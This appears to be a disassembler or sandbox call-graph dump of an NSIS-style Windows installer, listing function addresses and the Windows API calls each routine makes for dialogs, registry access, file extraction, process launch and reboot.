4095->4096 4097 401de8 EnableWindow 4096->4097 4098 401ddd ShowWindow 4096->4098 4099 4029c5 4097->4099 4098->4099 4101 405f0a 18 API calls 4100->4101 4102 402b2f 4101->4102 4102->4094 4862 4045c8 4863 4045f4 4862->4863 4864 404605 4862->4864 4923 4056a8 GetDlgItemTextW 4863->4923 4866 404611 GetDlgItem 4864->4866 4871 404670 4864->4871 4868 404625 4866->4868 4867 4045ff 4870 40617c 5 API calls 4867->4870 4873 404639 SetWindowTextW 4868->4873 4879 4059de 4 API calls 4868->4879 4869 404754 4874 4048f5 4869->4874 4928 4056a8 GetDlgItemTextW 4869->4928 4870->4864 4871->4869 4871->4874 4875 405f0a 18 API calls 4871->4875 4924 40412d 4873->4924 4943 404194 4874->4943 4880 4046e4 SHBrowseForFolderW 4875->4880 4876 404784 4881 405a3b 18 API calls 4876->4881 4884 40462f 4879->4884 4880->4869 4885 4046fc CoTaskMemFree 4880->4885 4886 40478a 4881->4886 4882 404655 4887 40412d 19 API calls 4882->4887 4884->4873 4890 405933 3 API calls 4884->4890 4888 405933 3 API calls 4885->4888 4929 405ee8 lstrcpynW 4886->4929 4889 404663 4887->4889 4891 404709 4888->4891 4927 404162 SendMessageW 4889->4927 4890->4873 4894 404740 SetDlgItemTextW 4891->4894 4899 405f0a 18 API calls 4891->4899 4894->4869 4895 404669 4897 406252 3 API calls 4895->4897 4896 4047a1 4898 406252 3 API calls 4896->4898 4897->4871 4906 4047a9 4898->4906 4900 404728 lstrcmpiW 4899->4900 4900->4894 4903 404739 lstrcatW 4900->4903 4901 4047e8 4930 405ee8 lstrcpynW 4901->4930 4903->4894 4904 4047ef 4905 4059de 4 API calls 4904->4905 4907 4047f5 GetDiskFreeSpaceW 4905->4907 4906->4901 4909 40597f 2 API calls 4906->4909 4911 40483a 4906->4911 4910 404818 MulDiv 4907->4910 4907->4911 4909->4906 4910->4911 4912 4048a4 4911->4912 4931 404976 4911->4931 4914 4048c7 4912->4914 4916 40140b 2 API calls 4912->4916 4939 40414f EnableWindow 4914->4939 4915 404896 4918 4048a6 SetDlgItemTextW 4915->4918 4919 40489b 4915->4919 4916->4914 4918->4912 4921 404976 21 API calls 4919->4921 4920 4048e3 4920->4874 4940 40455d 4920->4940 4921->4912 4923->4867 4925 405f0a 18 API calls 4924->4925 4926 404138 SetDlgItemTextW 4925->4926 4926->4882 4927->4895 4928->4876 4929->4896 4930->4904 4932 404993 4931->4932 4933 405f0a 18 API calls 4932->4933 4934 4049c8 4933->4934 4935 405f0a 18 API calls 4934->4935 4936 4049d3 4935->4936 4937 405f0a 18 API calls 4936->4937 4938 404a04 lstrlenW wsprintfW SetDlgItemTextW 4937->4938 4938->4915 4939->4920 4941 404570 SendMessageW 4940->4941 4942 40456b 4940->4942 4941->4874 4942->4941 4944 4041ac GetWindowLongW 4943->4944 4945 404235 4943->4945 4944->4945 4946 4041bd 4944->4946 4947 4041cc GetSysColor 4946->4947 4948 4041cf 4946->4948 4947->4948 4949 4041d5 SetTextColor 4948->4949 4950 4041df SetBkMode 4948->4950 4949->4950 4951 4041f7 GetSysColor 4950->4951 4952 4041fd 4950->4952 4951->4952 4953 404204 SetBkColor 4952->4953 4954 40420e 4952->4954 4953->4954 4954->4945 4955 404221 DeleteObject 4954->4955 4956 404228 CreateBrushIndirect 4954->4956 4955->4956 4956->4945 4957 4042ca 4958 4042e2 4957->4958 4959 4043fc 4957->4959 4963 40412d 19 API calls 4958->4963 4960 404466 4959->4960 4962 404538 4959->4962 4965 404437 GetDlgItem SendMessageW 4959->4965 4961 404470 GetDlgItem 4960->4961 4960->4962 4964 40448a 4961->4964 4968 4044f9 4961->4968 4967 404194 8 API calls 4962->4967 4966 404349 4963->4966 4964->4968 4972 4044b0 6 API calls 4964->4972 4988 40414f EnableWindow 4965->4988 4970 40412d 19 API calls 4966->4970 4971 404533 4967->4971 4968->4962 4973 40450b 4968->4973 4975 404356 CheckDlgButton 4970->4975 4972->4968 4976 404521 4973->4976 4977 404511 SendMessageW 4973->4977 4974 404461 4978 40455d SendMessageW 4974->4978 4986 40414f EnableWindow 4975->4986 4976->4971 4980 404527 SendMessageW 4976->4980 4977->4976 4978->4960 4980->4971 4981 404374 GetDlgItem 4987 404162 SendMessageW 4981->4987 4983 40438a SendMessageW 4984 4043b0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4983->4984 4985 4043a7 GetSysColor 4983->4985 4984->4971 4985->4984 4986->4981 4987->4983 4988->4974 4989 4024ca 4990 402b38 18 API calls 4989->4990 4991 4024d1 4990->4991 4994 405b54 GetFileAttributesW CreateFileW 4991->4994 4993 4024dd 4994->4993 4995 401bca 4996 402b1b 18 API calls 4995->4996 4997 401bd1 4996->4997 4998 402b1b 18 API calls 4997->4998 4999 401bdb 4998->4999 5000 401beb 4999->5000 5001 402b38 18 API calls 4999->5001 5002 401bfb 5000->5002 5003 402b38 18 API calls 5000->5003 5001->5000 5004 401c06 5002->5004 5005 401c4a 5002->5005 5003->5002 5007 402b1b 18 API calls 5004->5007 5006 402b38 18 API calls 5005->5006 5008 401c4f 5006->5008 5009 401c0b 5007->5009 5010 402b38 18 API calls 5008->5010 5011 402b1b 18 API calls 5009->5011 5012 401c58 FindWindowExW 5010->5012 5013 401c14 5011->5013 5016 401c7a 5012->5016 5014 401c3a SendMessageW 5013->5014 5015 401c1c SendMessageTimeoutW 5013->5015 5014->5016 5015->5016 5017 40194b 5018 402b1b 18 API calls 5017->5018 5019 401952 5018->5019 5020 402b1b 18 API calls 5019->5020 5021 40195c 5020->5021 5022 402b38 18 API calls 5021->5022 5023 401965 5022->5023 5024 401979 lstrlenW 5023->5024 5025 4019b5 5023->5025 5026 401983 5024->5026 5026->5025 5030 405ee8 lstrcpynW 5026->5030 5028 40199e 5028->5025 5029 4019ab lstrlenW 5028->5029 5029->5025 5030->5028 5034 4019cf 5035 402b38 18 API calls 5034->5035 5036 4019d6 5035->5036 5037 402b38 18 API calls 5036->5037 5038 4019df 5037->5038 5039 4019e6 lstrcmpiW 5038->5039 5040 4019f8 lstrcmpW 5038->5040 5041 4019ec 5039->5041 5040->5041 4195 401e51 4196 402b38 18 API calls 4195->4196 4197 401e57 4196->4197 4198 405192 25 API calls 4197->4198 4199 401e61 4198->4199 4213 405663 CreateProcessW 4199->4213 4202 401ec6 CloseHandle 4205 402791 4202->4205 4203 401e77 WaitForSingleObject 4204 401e89 4203->4204 4206 401e9b GetExitCodeProcess 4204->4206 4207 40628b 2 API calls 4204->4207 4208 401eba 4206->4208 4209 401ead 4206->4209 4210 401e90 WaitForSingleObject 4207->4210 4208->4202 4212 401eb8 4208->4212 4216 405e2f wsprintfW 4209->4216 4210->4204 4212->4202 4214 405692 CloseHandle 4213->4214 4215 401e67 4213->4215 4214->4215 4215->4202 4215->4203 4215->4205 4216->4212 4217 402251 4218 40225f 4217->4218 4219 402259 4217->4219 4220 40226d 4218->4220 4222 402b38 18 API calls 4218->4222 4221 402b38 18 API calls 4219->4221 4223 402b38 18 API calls 4220->4223 4225 40227b 4220->4225 4221->4218 4222->4220 4223->4225 4224 402b38 18 API calls 4226 402284 WritePrivateProfileStringW 4224->4226 4225->4224 5042 4052d1 5043 4052f2 GetDlgItem GetDlgItem GetDlgItem 5042->5043 5044 40547d 5042->5044 5087 404162 SendMessageW 5043->5087 5046 405486 GetDlgItem CreateThread CloseHandle 5044->5046 5047 4054ae 5044->5047 5046->5047 5049 4054d9 5047->5049 5050 4054c5 ShowWindow ShowWindow 5047->5050 5051 4054fe 5047->5051 5048 405363 5056 40536a GetClientRect GetSystemMetrics SendMessageW SendMessageW 5048->5056 5053 405513 ShowWindow 5049->5053 5054 4054ed 5049->5054 5057 405539 5049->5057 5089 404162 SendMessageW 5050->5089 5055 404194 8 API calls 5051->5055 5061 405533 5053->5061 5062 405525 5053->5062 5090 404106 5054->5090 5060 40550c 5055->5060 5063 4053d9 5056->5063 5064 4053bd SendMessageW SendMessageW 5056->5064 5057->5051 5058 405547 SendMessageW 5057->5058 5058->5060 5065 405560 CreatePopupMenu 5058->5065 5069 404106 SendMessageW 5061->5069 5068 405192 25 API calls 5062->5068 5066 4053ec 5063->5066 5067 4053de SendMessageW 5063->5067 5064->5063 5070 405f0a 18 API calls 5065->5070 5071 40412d 19 API calls 5066->5071 5067->5066 5068->5061 5069->5057 5072 405570 AppendMenuW 5070->5072 5073 4053fc 5071->5073 5074 4055a0 TrackPopupMenu 5072->5074 5075 40558d GetWindowRect 5072->5075 5076 405405 ShowWindow 5073->5076 5077 405439 GetDlgItem SendMessageW 5073->5077 5074->5060 5078 4055bb 5074->5078 5075->5074 5079 40541b ShowWindow 5076->5079 5082 405428 5076->5082 5077->5060 5080 405460 SendMessageW SendMessageW 5077->5080 5081 4055d7 SendMessageW 5078->5081 5079->5082 5080->5060 5081->5081 5083 4055f4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5081->5083 5088 404162 SendMessageW 5082->5088 5085 405619 SendMessageW 5083->5085 5085->5085 5086 405642 GlobalUnlock SetClipboardData CloseClipboard 5085->5086 5086->5060 5087->5048 5088->5077 5089->5049 5091 404113 SendMessageW 5090->5091 5092 40410d 5090->5092 5091->5051 5092->5091 4240 402452 4250 402c42 4240->4250 4242 40245c 4243 402b1b 18 API calls 4242->4243 4244 402465 4243->4244 4245 402489 RegEnumValueW 4244->4245 4246 40247d RegEnumKeyW 4244->4246 4248 402791 4244->4248 4247 4024a2 RegCloseKey 4245->4247 4245->4248 4246->4247 4247->4248 4251 402b38 18 API calls 4250->4251 4252 402c5b 4251->4252 4253 402c69 RegOpenKeyExW 4252->4253 4253->4242 4254 401752 4255 402b38 18 API calls 4254->4255 4256 401759 4255->4256 4257 401781 4256->4257 4258 401779 4256->4258 4295 405ee8 lstrcpynW 4257->4295 4294 405ee8 lstrcpynW 4258->4294 4261 40177f 4265 40617c 5 API calls 4261->4265 4262 40178c 4263 405933 3 API calls 4262->4263 4264 401792 lstrcatW 4263->4264 4264->4261 4282 40179e 4265->4282 4266 4017da 4268 405b2f 2 API calls 4266->4268 4267 40622b 2 API calls 4267->4282 4268->4282 4270 4017b0 CompareFileTime 4270->4282 4271 401870 4273 405192 25 API calls 4271->4273 4272 401847 4274 405192 25 API calls 4272->4274 4283 40185c 4272->4283 4276 40187a 4273->4276 4274->4283 4275 405ee8 lstrcpynW 4275->4282 4277 403060 46 API calls 4276->4277 4278 40188d 4277->4278 4279 4018a1 SetFileTime 4278->4279 4280 4018b3 CloseHandle 4278->4280 4279->4280 4280->4283 4284 4018c4 4280->4284 4281 405f0a 18 API calls 4281->4282 4282->4266 4282->4267 4282->4270 4282->4271 4282->4272 4282->4275 4282->4281 4293 405b54 GetFileAttributesW CreateFileW 4282->4293 4296 4056c4 4282->4296 4285 4018c9 4284->4285 4286 4018dc 4284->4286 4287 405f0a 18 API calls 4285->4287 4288 405f0a 18 API calls 4286->4288 4290 4018d1 lstrcatW 4287->4290 4291 4018e4 4288->4291 4290->4291 4292 4056c4 MessageBoxIndirectW 4291->4292 4292->4283 4293->4282 4294->4261 4295->4262 4297 4056d9 4296->4297 4298 405725 4297->4298 4299 4056ed MessageBoxIndirectW 4297->4299 4298->4282 4299->4298 4300 4022d3 4301 402303 4300->4301 4302 4022d8 4300->4302 4303 402b38 18 API calls 4301->4303 4304 402c42 19 API calls 4302->4304 4305 40230a 4303->4305 4306 4022df 4304->4306 4312 402b78 RegOpenKeyExW 4305->4312 4307 4022e9 4306->4307 4311 402320 4306->4311 4308 402b38 18 API calls 4307->4308 4309 4022f0 RegDeleteValueW RegCloseKey 4308->4309 4309->4311 4313 402c0c 4312->4313 4320 402ba3 4312->4320 4313->4311 4314 402bc9 RegEnumKeyW 4315 402bdb RegCloseKey 4314->4315 4314->4320 4317 406252 3 API calls 4315->4317 4316 402c00 RegCloseKey 4322 402bef 4316->4322 4319 402beb 4317->4319 4318 402b78 3 API calls 4318->4320 4321 402c1b RegDeleteKeyW 4319->4321 4319->4322 4320->4314 4320->4315 4320->4316 4320->4318 4321->4322 4322->4313 5093 401ed4 5094 402b38 18 API calls 5093->5094 5095 401edb 5094->5095 5096 40622b 2 API calls 5095->5096 5097 401ee1 5096->5097 5099 401ef2 5097->5099 5100 405e2f wsprintfW 5097->5100 5100->5099 5101 403c55 5102 403da8 5101->5102 5103 403c6d 5101->5103 5105 403df9 5102->5105 5106 403db9 GetDlgItem GetDlgItem 5102->5106 5103->5102 5104 403c79 5103->5104 5107 403c84 SetWindowPos 5104->5107 5108 403c97 5104->5108 5110 403e53 5105->5110 5115 401389 2 API calls 5105->5115 5109 40412d 19 API calls 5106->5109 5107->5108 5112 403cb4 5108->5112 5113 403c9c ShowWindow 5108->5113 5114 403de3 SetClassLongW 5109->5114 5111 404179 SendMessageW 5110->5111 5131 403da3 5110->5131 5140 403e65 5111->5140 5116 403cd6 5112->5116 5117 403cbc DestroyWindow 5112->5117 5113->5112 5118 40140b 2 API calls 5114->5118 5119 403e2b 5115->5119 5120 403cdb SetWindowLongW 5116->5120 5121 403cec 5116->5121 5168 4040b6 5117->5168 5118->5105 5119->5110 5122 403e2f SendMessageW 5119->5122 5120->5131 5125 403d63 5121->5125 5126 403cf8 GetDlgItem 5121->5126 5122->5131 5123 40140b 2 API calls 5123->5140 5124 4040b8 DestroyWindow EndDialog 5124->5168 5129 404194 8 API calls 5125->5129 5127 403d28 5126->5127 5128 403d0b SendMessageW IsWindowEnabled 5126->5128 5133 403d35 5127->5133 5134 403d7c SendMessageW 5127->5134 5135 403d48 5127->5135 5144 403d2d 5127->5144 5128->5127 5128->5131 5129->5131 5130 4040e7 ShowWindow 5130->5131 5132 405f0a 18 API calls 5132->5140 5133->5134 5133->5144 5134->5125 5138 403d50 5135->5138 5139 403d65 5135->5139 5136 404106 SendMessageW 5136->5125 5137 40412d 19 API calls 5137->5140 5142 40140b 2 API calls 5138->5142 5141 40140b 2 API calls 5139->5141 5140->5123 5140->5124 5140->5131 5140->5132 5140->5137 5143 40412d 19 API calls 5140->5143 5159 403ff8 DestroyWindow 5140->5159 5141->5144 5142->5144 5145 403ee0 GetDlgItem 5143->5145 5144->5125 5144->5136 5146 403ef5 5145->5146 5147 403efd ShowWindow EnableWindow 5145->5147 5146->5147 5169 40414f EnableWindow 5147->5169 5149 403f27 EnableWindow 5152 403f3b 5149->5152 5150 403f40 GetSystemMenu EnableMenuItem SendMessageW 5151 403f70 SendMessageW 5150->5151 5150->5152 5151->5152 5152->5150 5170 404162 SendMessageW 5152->5170 5171 405ee8 lstrcpynW 5152->5171 5155 403f9e lstrlenW 5156 405f0a 18 API calls 5155->5156 5157 403fb4 SetWindowTextW 5156->5157 5158 401389 2 API calls 5157->5158 5158->5140 5160 404012 CreateDialogParamW 5159->5160 5159->5168 5161 404045 5160->5161 5160->5168 5162 40412d 19 API calls 5161->5162 5163 404050 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5162->5163 5164 401389 2 API calls 5163->5164 5165 404096 5164->5165 5165->5131 5166 40409e ShowWindow 5165->5166 5167 404179 SendMessageW 5166->5167 5167->5168 5168->5130 5168->5131 5169->5149 5170->5152 5171->5155 4338 10002796 4339 100027e6 4338->4339 4340 100027a6 VirtualProtect 4338->4340 4340->4339 4341 4014d7 4342 402b1b 18 API calls 4341->4342 4343 4014dd Sleep 4342->4343 4345 4029c5 4343->4345 4355 403358 #17 SetErrorMode OleInitialize 4356 406252 3 API calls 4355->4356 4357 40339b SHGetFileInfoW 4356->4357 4428 405ee8 lstrcpynW 4357->4428 4359 4033c6 GetCommandLineW 4429 405ee8 lstrcpynW 4359->4429 4361 4033d8 GetModuleHandleW 4362 4033f0 4361->4362 4363 405960 CharNextW 4362->4363 4364 4033ff CharNextW 4363->4364 4374 40340f 4364->4374 4365 4034e4 4366 4034f8 GetTempPathW 4365->4366 4430 403324 4366->4430 4368 403510 4369 403514 GetWindowsDirectoryW lstrcatW 4368->4369 4370 40356a DeleteFileW 4368->4370 4372 403324 11 API calls 4369->4372 4438 402dba GetTickCount GetModuleFileNameW 4370->4438 4371 405960 CharNextW 4371->4374 4375 403530 4372->4375 4374->4365 4374->4371 4378 4034e6 4374->4378 4375->4370 4377 403534 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4375->4377 4376 40357e 4379 403616 4376->4379 4382 403606 4376->4382 4386 405960 CharNextW 4376->4386 4381 403324 11 API calls 4377->4381 4523 405ee8 lstrcpynW 4378->4523 4526 4037c0 4379->4526 4385 403562 4381->4385 4468 4038b2 4382->4468 4385->4370 4385->4379 4390 403599 4386->4390 4388 403725 4392 4037a8 ExitProcess 4388->4392 4397 406252 3 API calls 4388->4397 4389 40362f 4391 4056c4 MessageBoxIndirectW 4389->4391 4394 4035e0 4390->4394 4395 403645 lstrcatW lstrcmpiW 4390->4395 4396 40363d ExitProcess 4391->4396 4399 405a3b 18 API calls 4394->4399 4395->4379 4400 403661 CreateDirectoryW SetCurrentDirectoryW 4395->4400 4398 403734 4397->4398 4401 406252 3 API calls 4398->4401 4402 4035ec 4399->4402 4403 403684 4400->4403 4404 403679 4400->4404 4405 40373d 4401->4405 4402->4379 4524 405ee8 lstrcpynW 4402->4524 4536 405ee8 lstrcpynW 4403->4536 4535 405ee8 lstrcpynW 4404->4535 4408 406252 3 API calls 4405->4408 4410 403746 4408->4410 4412 403794 ExitWindowsEx 4410->4412 4419 403754 GetCurrentProcess 4410->4419 4411 4035fb 4525 405ee8 lstrcpynW 4411->4525 4412->4392 4415 4037a1 4412->4415 4414 405f0a 18 API calls 4416 4036c3 DeleteFileW 4414->4416 4537 40140b 4415->4537 4418 4036d0 CopyFileW 4416->4418 4425 403692 4416->4425 4418->4425 4422 403764 4419->4422 4420 403719 4423 405d82 40 API calls 4420->4423 4421 405d82 40 API calls 4421->4425 4422->4412 4423->4379 4424 405f0a 18 API calls 4424->4425 4425->4414 4425->4420 4425->4421 4425->4424 4426 405663 2 API calls 4425->4426 4427 403704 CloseHandle 4425->4427 4426->4425 4427->4425 4428->4359 4429->4361 4431 40617c 5 API calls 4430->4431 4433 403330 4431->4433 4432 40333a 4432->4368 4433->4432 4434 405933 3 API calls 4433->4434 4435 403342 CreateDirectoryW 4434->4435 4540 405b83 4435->4540 4544 405b54 GetFileAttributesW CreateFileW 4438->4544 4440 402dfd 4467 402e0a 4440->4467 4545 405ee8 lstrcpynW 4440->4545 4442 402e20 4443 40597f 2 API calls 4442->4443 4444 402e26 4443->4444 4546 405ee8 lstrcpynW 4444->4546 4446 402e31 GetFileSize 4447 402f32 4446->4447 4465 402e48 4446->4465 4448 402d18 33 API calls 4447->4448 4450 402f39 4448->4450 4449 4032f7 ReadFile 4449->4465 4452 402f75 GlobalAlloc 4450->4452 4450->4467 4548 40330d SetFilePointer 4450->4548 4451 402fcd 4454 402d18 33 API calls 4451->4454 4453 402f8c 4452->4453 4458 405b83 2 API calls 4453->4458 4454->4467 4456 402f56 4459 4032f7 ReadFile 4456->4459 4457 402d18 33 API calls 4457->4465 4461 402f9d CreateFileW 4458->4461 4460 402f61 4459->4460 4460->4452 4460->4467 4462 402fd7 4461->4462 4461->4467 4547 40330d SetFilePointer 4462->4547 4464 402fe5 4466 403060 46 API calls 4464->4466 4465->4447 4465->4449 4465->4451 4465->4457 4465->4467 4466->4467 4467->4376 4469 406252 3 API calls 4468->4469 4470 4038c6 4469->4470 4471 4038cc 4470->4471 4472 4038de 4470->4472 4558 405e2f wsprintfW 4471->4558 4473 405db5 3 API calls 4472->4473 4474 40390e 4473->4474 4476 40392d lstrcatW 4474->4476 4478 405db5 3 API calls 4474->4478 4477 4038dc 4476->4477 4549 403b88 4477->4549 4478->4476 4481 405a3b 18 API calls 4482 40395f 4481->4482 4483 4039f3 4482->4483 4485 405db5 3 API calls 4482->4485 4484 405a3b 18 API calls 4483->4484 4486 4039f9 4484->4486 4487 403991 4485->4487 4488 403a09 LoadImageW 4486->4488 4489 405f0a 18 API calls 4486->4489 4487->4483 4493 4039b2 lstrlenW 4487->4493 4497 405960 CharNextW 4487->4497 4490 403a30 RegisterClassW 4488->4490 4491 403aaf 4488->4491 4489->4488 4494 403a66 SystemParametersInfoW CreateWindowExW 4490->4494 4495 403ab9 4490->4495 4492 40140b 2 API calls 4491->4492 4496 403ab5 4492->4496 4498 4039c0 lstrcmpiW 4493->4498 4499 4039e6 4493->4499 4494->4491 4495->4379 4496->4495 4504 403b88 19 API calls 4496->4504 4501 4039af 4497->4501 4498->4499 4502 4039d0 GetFileAttributesW 4498->4502 4500 405933 3 API calls 4499->4500 4505 4039ec 4500->4505 4501->4493 4503 4039dc 4502->4503 4503->4499 4506 40597f 2 API calls 4503->4506 4507 403ac6 4504->4507 4559 405ee8 lstrcpynW 4505->4559 4506->4499 4509 403ad2 ShowWindow LoadLibraryW 4507->4509 4510 403b55 4507->4510 4512 403af1 LoadLibraryW 4509->4512 4513 403af8 GetClassInfoW 4509->4513 4560 405265 OleInitialize 4510->4560 4512->4513 4515 403b22 DialogBoxParamW 4513->4515 4516 403b0c GetClassInfoW RegisterClassW 4513->4516 4514 403b5b 4517 403b77 4514->4517 4518 403b5f 4514->4518 4519 40140b 2 API calls 4515->4519 4516->4515 4520 40140b 2 API calls 4517->4520 4518->4495 4521 40140b 2 API calls 4518->4521 4522 403b4a 4519->4522 4520->4495 4521->4495 4522->4495 4523->4366 4524->4411 4525->4382 4527 4037d1 CloseHandle 4526->4527 4528 4037db 4526->4528 4527->4528 4529 4037e5 CloseHandle 4528->4529 4530 4037ef 4528->4530 4529->4530 4575 40381d 4530->4575 4533 405770 71 API calls 4534 40361f OleUninitialize 4533->4534 4534->4388 4534->4389 4535->4403 4536->4425 4538 401389 2 API calls 4537->4538 4539 401420 4538->4539 4539->4392 4541 405b90 GetTickCount GetTempFileNameW 4540->4541 4542 403356 4541->4542 4543 405bc6 4541->4543 4542->4368 4543->4541 4543->4542 4544->4440 4545->4442 4546->4446 4547->4464 4548->4456 4550 403b9c 4549->4550 4567 405e2f wsprintfW 4550->4567 4552 403c0d 4553 405f0a 18 API calls 4552->4553 4554 403c19 SetWindowTextW 4553->4554 4555 40393d 4554->4555 4556 403c35 4554->4556 4555->4481 4556->4555 4557 405f0a 18 API calls 4556->4557 4557->4556 4558->4477 4559->4483 4568 404179 4560->4568 4562 405288 4566 4052af 4562->4566 4571 401389 4562->4571 4563 404179 SendMessageW 4564 4052c1 OleUninitialize 4563->4564 4564->4514 4566->4563 4567->4552 4569 404191 4568->4569 4570 404182 SendMessageW 4568->4570 4569->4562 4570->4569 4573 401390 4571->4573 4572 4013fe 4572->4562 4573->4572 4574 4013cb MulDiv SendMessageW 4573->4574 4574->4573 4577 40382b 4575->4577 4576 4037f4 4576->4533 4577->4576 4578 403830 FreeLibrary GlobalFree 4577->4578 4578->4576 4578->4578 5172 40155b 5173 40296b 5172->5173 5176 405e2f wsprintfW 5173->5176 5175 402970 5176->5175 4797 4023de 4798 402c42 19 API calls 4797->4798 4799 4023e8 4798->4799 4800 402b38 18 API calls 4799->4800 4801 4023f1 4800->4801 4802 4023fc RegQueryValueExW 4801->4802 4806 402791 4801->4806 4803 40241c 4802->4803 4804 402422 RegCloseKey 4802->4804 4803->4804 4808 405e2f wsprintfW 4803->4808 4804->4806 4808->4804 5184 401ce5 GetDlgItem GetClientRect 5185 402b38 18 API calls 5184->5185 5186 401d17 LoadImageW SendMessageW 5185->5186 5187 4029c5 5186->5187 5188 401d35 DeleteObject 5186->5188 5188->5187 5189 40206a 5190 402b38 18 API calls 5189->5190 5191 402071 5190->5191 5192 402b38 18 API calls 5191->5192 5193 40207b 5192->5193 5194 402b38 18 API calls 5193->5194 5195 402084 5194->5195 5196 402b38 18 API calls 5195->5196 5197 40208e 5196->5197 5198 402b38 18 API calls 5197->5198 5199 402098 5198->5199 5200 4020ac CoCreateInstance 5199->5200 5201 402b38 18 API calls 5199->5201 5204 4020cb 5200->5204 5201->5200 5202 401423 25 API calls 5203 402195 5202->5203 5204->5202 5204->5203 5205 40156b 5206 401584 5205->5206 5207 40157b ShowWindow 5205->5207 5208 401592 ShowWindow 5206->5208 5209 4029c5 5206->5209 5207->5206 5208->5209 5210 4024ec 5211 4024f1 5210->5211 5212 40250a 5210->5212 5213 402b1b 18 API calls 5211->5213 5214 402510 5212->5214 5215 40253c 5212->5215 5220 4024f8 5213->5220 5216 402b38 18 API calls 5214->5216 5217 402b38 18 API calls 5215->5217 5218 402517 WideCharToMultiByte lstrlenA 5216->5218 5219 402543 lstrlenW 5217->5219 5218->5220 5219->5220 5221 402565 WriteFile 5220->5221 5222 402791 5220->5222 5221->5222 4107 40276e 4108 402b38 18 API calls 4107->4108 4109 402775 FindFirstFileW 4108->4109 4110 40279d 4109->4110 4113 402788 4109->4113 4111 4027a6 4110->4111 4115 405e2f wsprintfW 4110->4115 4116 405ee8 lstrcpynW 4111->4116 4115->4111 4116->4113 5223 4018ef 5224 401926 5223->5224 5225 402b38 18 API calls 5224->5225 5226 40192b 5225->5226 5227 405770 71 API calls 5226->5227 5228 401934 5227->5228 5229 403870 5230 40387b 5229->5230 5231 403882 GlobalAlloc 5230->5231 5232 40387f 5230->5232 5231->5232 4227 402571 4228 402b1b 18 API calls 4227->4228 4230 402580 4228->4230 4229 40269e 4230->4229 4231 4025c6 ReadFile 4230->4231 4232 405bd7 ReadFile 4230->4232 4233 4026a0 4230->4233 4234 402606 MultiByteToWideChar 4230->4234 4236 40262c SetFilePointer MultiByteToWideChar 4230->4236 4237 4026b1 4230->4237 4231->4229 4231->4230 4232->4230 4239 405e2f wsprintfW 4233->4239 4234->4230 4236->4230 4237->4229 4238 4026d2 SetFilePointer 4237->4238 4238->4229 4239->4229 5233 4014f1 SetForegroundWindow 5234 4029c5 5233->5234 5242 4018f2 5243 402b38 18 API calls 5242->5243 5244 4018f9 5243->5244 5245 4056c4 MessageBoxIndirectW 5244->5245 5246 401902 5245->5246 4323 401df3 4324 402b38 18 API calls 4323->4324 4325 401df9 4324->4325 4326 402b38 18 API calls 4325->4326 4327 401e02 4326->4327 4328 402b38 18 API calls 4327->4328 4329 401e0b 4328->4329 4330 402b38 18 API calls 4329->4330 4331 401e14 4330->4331 4335 401423 4331->4335 4334 401e4c 4336 405192 25 API calls 4335->4336 4337 401431 ShellExecuteW 4336->4337 4337->4334 4346 4026f7 4347 4026fe 4346->4347 4349 402970 4346->4349 4348 402b1b 18 API calls 4347->4348 4350 402709 4348->4350 4351 402710 SetFilePointer 4350->4351 4351->4349 4352 402720 4351->4352 4354 405e2f wsprintfW 4352->4354 4354->4349 5266 40427b lstrlenW 5267 40429a 5266->5267 5268 40429c WideCharToMultiByte 5266->5268 5267->5268 5269 1000103d 5270 1000101b 8 API calls 5269->5270 5271 10001056 5270->5271 5272 402c7d 5273 402ca8 5272->5273 5274 402c8f SetTimer 5272->5274 5275 402cf6 5273->5275 5276 402cfc MulDiv 5273->5276 5274->5273 5277 402cb6 wsprintfW SetWindowTextW SetDlgItemTextW 5276->5277 5277->5275 5279 4014ff 5280 401507 5279->5280 5282 40151a 5279->5282 5281 402b1b 18 API calls 5280->5281 5281->5282 5283 401000 5284 401037 BeginPaint GetClientRect 5283->5284 5287 40100c DefWindowProcW 5283->5287 5285 4010f3 5284->5285 5288 401073 CreateBrushIndirect FillRect DeleteObject 5285->5288 5289 4010fc 5285->5289 5290 401179 5287->5290 5288->5285 5291 401102 CreateFontIndirectW 5289->5291 5292 401167 EndPaint 5289->5292 5291->5292 5293 401112 6 API calls 5291->5293 5292->5290 5293->5292 5294 401a00 5295 402b38 18 API calls 5294->5295 5296 401a09 ExpandEnvironmentStringsW 5295->5296 5297 401a30 5296->5297 5298 401a1d 5296->5298 5298->5297 5299 401a22 lstrcmpW 5298->5299 5299->5297 5300 401b01 5301 402b38 18 API calls 5300->5301 5302 401b08 5301->5302 5303 402b1b 18 API calls 5302->5303 5304 401b11 wsprintfW 5303->5304 5305 4029c5 5304->5305 5306 100018c1 5307 10001243 3 API calls 5306->5307 5308 100018e7 5307->5308 5309 10001243 3 API calls 5308->5309 5310 100018ef 5309->5310 5311 10001243 3 API calls 5310->5311 5313 10001931 5310->5313 5312 10001916 5311->5312 5314 1000191f GlobalFree 5312->5314 5315 10001280 2 API calls 5313->5315 5314->5313 5316 10001aad GlobalFree GlobalFree 5315->5316 5317 404581 5318 404591 5317->5318 5319 4045b7 5317->5319 5320 40412d 19 API calls 5318->5320 5321 404194 8 API calls 5319->5321 5322 40459e SetDlgItemTextW 5320->5322 5323 4045c3 5321->5323 5322->5319 5324 405106 5325 405116 5324->5325 5326 40512a 5324->5326 5327 405173 5325->5327 5328 40511c 5325->5328 5329 405132 IsWindowVisible 5326->5329 5335 405149 5326->5335 5330 405178 CallWindowProcW 5327->5330 5331 404179 SendMessageW 5328->5331 5329->5327 5332 40513f 5329->5332 5333 405126 5330->5333 5331->5333 5337 404a5c SendMessageW 5332->5337 5335->5330 5342 404adc 5335->5342 5338 404abb SendMessageW 5337->5338 5339 404a7f GetMessagePos ScreenToClient SendMessageW 5337->5339 5340 404ab3 5338->5340 5339->5340 5341 404ab8 5339->5341 5340->5335 5341->5338 5351 405ee8 lstrcpynW 5342->5351 5344 404aef 5352 405e2f wsprintfW 5344->5352 5346 404af9 5347 40140b 2 API calls 5346->5347 5348 404b02 5347->5348 5353 405ee8 lstrcpynW 5348->5353 5350 404b09 5350->5327 5351->5344 5352->5346 5353->5350 5354 401f08 5355 402b38 18 API calls 5354->5355 5356 401f0f GetFileVersionInfoSizeW 5355->5356 5357 401f36 GlobalAlloc 5356->5357 5358 401f8c 5356->5358 5357->5358 5359 401f4a GetFileVersionInfoW 5357->5359 5359->5358 5360 401f59 